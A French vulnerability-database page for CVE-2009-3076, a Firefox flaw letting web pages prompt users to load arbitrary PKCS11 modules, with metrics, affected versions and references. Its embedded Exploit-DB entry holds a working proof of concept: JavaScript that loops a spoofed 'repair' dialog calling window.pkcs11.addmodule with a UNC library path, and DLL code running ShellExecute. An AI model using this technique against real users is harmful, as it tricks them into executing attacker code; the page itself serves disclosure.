CVE-2009-3076 : Détail

CVE-2009-3076

88.69%V3
Network
2009-09-10
19h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Mozilla Firefox before 3.0.14 does not properly implement certain dialogs associated with the (1) pkcs11.addmodule and (2) pkcs11.deletemodule operations, which makes it easier for remote attackers to trick a user into installing or removing an arbitrary PKCS11 module.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 9651

Date de publication : 2009-09-10 22h00 +00:00
Auteur : Dan Kaminsky
EDB Vérifié : Yes

Fix announce: http://www.mozilla.org/security/announce/2009/mfsa2009-48.html Bug history: https://bugzilla.mozilla.org/show_bug.cgi?id=326628 So, Firefox up through 3.0.13 had an obscure little function under window.pkcs11: long addmodule(in DOMString moduleName, in DOMString libraryFullPath, in long cryptoMechanismFlags, in long cipherFlags); Yes, that's actually the full path to a DLL -- or an .so on Linux/OSX -- from a JS function that's exposed to the web. Attacker doesn't get zero click install -- there's a dialog -- but: 1) Attacker does get to customize the dialog via moduleName 2) The dialog is modal, so the user doesn't get access to Firefox again until they hit OK (can't even close Firefox) 3) On Windows, he can put a UNC path in for the Library path. There's probably similar on OSX and some Linux distros. Even without, there's usually a way to get a file in a known location -- see John Heasman's Java work. LoadLibrary of Attacker library on OK. Repro: <body> <script> var str = "Error detected in Firefox Module NSP31337.bin.\n" + "Please click 'OK' to repair." ret=-2; while(ret!=-5){ ret=window.pkcs11.addmodule("\n\n\n" + str + "\n\n\n", "\\\\127.0.0.1\\c$\\ pkunkcs", 0, 0); } </script> "Shellcode" is just a DLL with ShellExecute in the constructor: CpkunkcsApp::CpkunkcsApp() { char *str = "c:\\windows\\system32\\calc.exe"; wchar_t *wText; size_t len; len = strlen(str)+1; wText = new wchar_t[strlen(str)]; memset(wText, 0, len * sizeof(wchar_t)); ::MultiByteToWideChar(CP_ACP, NULL, str, -1, wText, len); ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW); } Cheers to Jesse Ruderman, who recognized this was probably not the greatest of API's some time ago. The bug history is worth taking a look at...goes back a while. They missed the UNC path vector, and appear to have underestimated the modal dialog. # milw0rm.com [2009-09-11]

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version To (including) 3.0.13

Mozilla>>Firefox >> Version 0.1

Mozilla>>Firefox >> Version 0.2

Mozilla>>Firefox >> Version 0.3

Mozilla>>Firefox >> Version 0.4

Mozilla>>Firefox >> Version 0.5

Mozilla>>Firefox >> Version 0.6

Mozilla>>Firefox >> Version 0.6.1

Mozilla>>Firefox >> Version 0.7

Mozilla>>Firefox >> Version 0.7.1

Mozilla>>Firefox >> Version 0.8

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9.1

Mozilla>>Firefox >> Version 0.9.2

Mozilla>>Firefox >> Version 0.9.3

Mozilla>>Firefox >> Version 0.9_rc

    Mozilla>>Firefox >> Version 0.10

    Mozilla>>Firefox >> Version 0.10.1

    Mozilla>>Firefox >> Version 1.0

    Mozilla>>Firefox >> Version 1.0

    Mozilla>>Firefox >> Version 1.0.1

    Mozilla>>Firefox >> Version 1.0.2

    Mozilla>>Firefox >> Version 1.0.3

    Mozilla>>Firefox >> Version 1.0.4

    Mozilla>>Firefox >> Version 1.0.5

    Mozilla>>Firefox >> Version 1.0.6

    Mozilla>>Firefox >> Version 1.0.7

    Mozilla>>Firefox >> Version 1.0.8

    Mozilla>>Firefox >> Version 1.4.1

    Mozilla>>Firefox >> Version 1.5

    Mozilla>>Firefox >> Version 1.5

    Mozilla>>Firefox >> Version 1.5

    Mozilla>>Firefox >> Version 1.5.0.1

    Mozilla>>Firefox >> Version 1.5.0.2

    Mozilla>>Firefox >> Version 1.5.0.3

    Mozilla>>Firefox >> Version 1.5.0.4

    Mozilla>>Firefox >> Version 1.5.0.5

    Mozilla>>Firefox >> Version 1.5.0.6

    Mozilla>>Firefox >> Version 1.5.0.7

    Mozilla>>Firefox >> Version 1.5.0.8

    Mozilla>>Firefox >> Version 1.5.0.9

    Mozilla>>Firefox >> Version 1.5.0.10

    Mozilla>>Firefox >> Version 1.5.0.11

    Mozilla>>Firefox >> Version 1.5.0.12

    Mozilla>>Firefox >> Version 1.5.1

    Mozilla>>Firefox >> Version 1.5.2

    Mozilla>>Firefox >> Version 1.5.3

    Mozilla>>Firefox >> Version 1.5.4

    Mozilla>>Firefox >> Version 1.5.5

    Mozilla>>Firefox >> Version 1.5.6

    Mozilla>>Firefox >> Version 1.5.7

    Mozilla>>Firefox >> Version 1.5.8

    Mozilla>>Firefox >> Version 1.8

    Mozilla>>Firefox >> Version 2.0

    Mozilla>>Firefox >> Version 2.0

      Mozilla>>Firefox >> Version 2.0

        Mozilla>>Firefox >> Version 2.0

          Mozilla>>Firefox >> Version 2.0

            Mozilla>>Firefox >> Version 2.0.0.1

            Mozilla>>Firefox >> Version 2.0.0.2

            Mozilla>>Firefox >> Version 2.0.0.3

            Mozilla>>Firefox >> Version 2.0.0.4

            Mozilla>>Firefox >> Version 2.0.0.5

            Mozilla>>Firefox >> Version 2.0.0.6

            Mozilla>>Firefox >> Version 2.0.0.7

            Mozilla>>Firefox >> Version 2.0.0.8

            Mozilla>>Firefox >> Version 2.0.0.9

            Mozilla>>Firefox >> Version 2.0.0.10

            Mozilla>>Firefox >> Version 2.0.0.11

            Mozilla>>Firefox >> Version 2.0.0.12

            Mozilla>>Firefox >> Version 2.0.0.13

            Mozilla>>Firefox >> Version 2.0.0.14

            Mozilla>>Firefox >> Version 2.0.0.15

            Mozilla>>Firefox >> Version 2.0.0.16

            Mozilla>>Firefox >> Version 2.0.0.17

            Mozilla>>Firefox >> Version 2.0.0.18

            Mozilla>>Firefox >> Version 2.0.0.19

            Mozilla>>Firefox >> Version 2.0.0.20

            Mozilla>>Firefox >> Version 2.0.0.21

              Mozilla>>Firefox >> Version 2.0_.1

                Mozilla>>Firefox >> Version 2.0_.4

                  Mozilla>>Firefox >> Version 2.0_.5

                    Mozilla>>Firefox >> Version 2.0_.6

                      Mozilla>>Firefox >> Version 2.0_.7

                        Mozilla>>Firefox >> Version 2.0_.9

                          Mozilla>>Firefox >> Version 2.0_.10

                            Mozilla>>Firefox >> Version 2.0_8

                              Mozilla>>Firefox >> Version 3.0

                              Mozilla>>Firefox >> Version 3.0

                                Mozilla>>Firefox >> Version 3.0

                                Mozilla>>Firefox >> Version 3.0

                                  Mozilla>>Firefox >> Version 3.0.1

                                  Mozilla>>Firefox >> Version 3.0.2

                                  Mozilla>>Firefox >> Version 3.0.3

                                  Mozilla>>Firefox >> Version 3.0.4

                                  Mozilla>>Firefox >> Version 3.0.5

                                  Mozilla>>Firefox >> Version 3.0.6

                                  Mozilla>>Firefox >> Version 3.0.7

                                  Mozilla>>Firefox >> Version 3.0.8

                                  Mozilla>>Firefox >> Version 3.0.9

                                  Mozilla>>Firefox >> Version 3.0.10

                                  Mozilla>>Firefox >> Version 3.0.11

                                  Mozilla>>Firefox >> Version 3.0.12

                                  Références

                                  http://www.securitytracker.com/id?1022877
                                  Tags : vdb-entry, x_refsource_SECTRACK
                                  http://www.debian.org/security/2009/dsa-1885
                                  Tags : vendor-advisory, x_refsource_DEBIAN
                                  http://www.redhat.com/support/errata/RHSA-2010-0153.html
                                  Tags : vendor-advisory, x_refsource_REDHAT
                                  http://www.securityfocus.com/bid/36343
                                  Tags : vdb-entry, x_refsource_BID
                                  http://www.redhat.com/support/errata/RHSA-2009-1430.html
                                  Tags : vendor-advisory, x_refsource_REDHAT
                                  http://www.vupen.com/english/advisories/2010/0650
                                  Tags : vdb-entry, x_refsource_VUPEN
                                  http://secunia.com/advisories/36692
                                  Tags : third-party-advisory, x_refsource_SECUNIA
                                  http://secunia.com/advisories/36670
                                  Tags : third-party-advisory, x_refsource_SECUNIA
                                  http://secunia.com/advisories/36671
                                  Tags : third-party-advisory, x_refsource_SECUNIA
                                  http://secunia.com/advisories/36669
                                  Tags : third-party-advisory, x_refsource_SECUNIA
                                  http://www.redhat.com/support/errata/RHSA-2010-0154.html
                                  Tags : vendor-advisory, x_refsource_REDHAT
                                  http://www.redhat.com/support/errata/RHSA-2009-1432.html
                                  Tags : vendor-advisory, x_refsource_REDHAT
                                  http://secunia.com/advisories/37098
                                  Tags : third-party-advisory, x_refsource_SECUNIA
                                  http://www.redhat.com/support/errata/RHSA-2009-1431.html
                                  Tags : vendor-advisory, x_refsource_REDHAT